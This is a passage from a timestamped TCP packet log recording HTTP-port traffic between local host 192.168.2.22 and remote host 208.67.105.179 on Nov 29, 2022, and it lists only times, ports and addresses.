Nov 29, 2022 16:50:19.545898914 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545923948 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545937061 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545962095 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545986891 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546004057 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546004057 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546020031 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546037912 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546062946 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546077967 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546092033 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546108007 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546133041 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546154022 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546168089 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546180010 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546205044 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546217918 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546240091 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546267033 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546287060 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546304941 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546329975 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546340942 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546364069 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546380043 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546406031 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546422958 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546442986 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546453953 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546483040 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546492100 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546518087 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546528101 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546556950 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546564102 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546591997 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546598911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546623945 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546643019 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546658993 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546672106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546695948 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546708107 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546722889 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546741962 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546767950 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546789885 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546803951 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546813965 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546837091 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546854019 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546869040 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546909094 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546936035 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546957016 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.546972036 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.546997070 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.547008991 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.547035933 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.547043085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.547068119 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.547076941 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.547103882 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.547302008 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.547801018 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.552634001 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.552740097 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.575579882 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575624943 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575650930 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575675011 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575700045 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575726032 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575758934 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.575778008 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.575788021 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575813055 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575831890 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.575849056 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.575936079 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.575936079 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576025963 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576060057 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576078892 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576109886 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576128960 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576155901 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576165915 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576190948 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576204062 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576230049 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576244116 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576296091 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576358080 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576394081 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576426029 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576463938 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576488018 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576515913 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576551914 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576581001 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576600075 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576626062 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576654911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576666117 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576680899 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576705933 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576728106 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576745987 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576760054 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576773882 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576792955 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576817989 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576833963 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576858997 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576867104 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576893091 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576936007 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.576958895 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576987028 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.576998949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577018023 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577035904 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577061892 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577080011 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577096939 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577110052 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577140093 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577163935 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577181101 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577198982 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577213049 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577238083 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577264071 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577274084 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577300072 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577311039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577337027 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577361107 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577382088 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577389956 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577414036 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577425957 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577452898 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.577502012 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.577563047 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605083942 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605129957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605153084 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605175018 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605197906 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605222940 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605256081 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605285883 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605304956 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605320930 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605349064 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605360985 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605389118 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605401039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605424881 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605438948 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605465889 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605477095 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605500937 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605513096 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605539083 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605550051 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605575085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605587959 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605616093 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605626106 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605648041 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605664015 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605693102 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605704069 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605726957 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605745077 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605771065 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605781078 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605804920 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605819941 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605848074 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605858088 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605881929 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605895042 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605922937 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605933905 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605964899 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.605973959 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.605997086 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606012106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606043100 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606050968 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606079102 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606089115 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606113911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606127977 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606154919 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606164932 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606192112 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606204033 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606230021 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606240988 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606264114 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606280088 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606306076 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606314898 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606338024 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606353045 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606380939 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606393099 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606417894 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606431961 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606456041 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606467009 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606492043 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606518984 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606530905 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606555939 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606570959 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606597900 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606609106 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606635094 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606646061 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606674910 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.606684923 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.606710911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634249926 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634290934 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634315968 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634340048 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634363890 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634385109 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634385109 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634407043 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634430885 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634455919 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634473085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634473085 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634495974 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634509087 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634533882 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634548903 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634567976 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634579897 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634605885 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634619951 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634643078 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634651899 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634684086 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634706974 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634721994 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634747982 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634758949 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634768963 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634792089 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634816885 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634835005 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634860039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634869099 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634910107 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.634941101 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634979010 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.634990931 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635015965 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635029078 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635056973 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635065079 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635092974 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635101080 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635126114 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635135889 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635164976 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635171890 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635198116 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635205030 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635234118 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635247946 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635276079 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635282993 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635310888 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635324955 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635353088 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635361910 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635390043 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635397911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635422945 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635436058 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635462999 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635473013 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635499954 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635507107 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635535002 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635544062 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635569096 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635579109 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635602951 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635613918 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635637999 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635652065 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635675907 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635685921 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635709047 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635720015 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635744095 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635752916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635780096 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635799885 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635818005 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.635827065 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.635991096 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.645154953 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.645224094 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.645263910 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.645330906 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.664683104 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664743900 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664782047 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664802074 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664813042 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664840937 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664865971 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664896011 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664912939 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664926052 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.664958954 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.664979935 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.664995909 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665019035 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665041924 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665056944 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665076971 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665092945 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665112972 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665139914 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.665152073 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.665175915 CET	49171	80	192.168.2.22	208.67.105.179
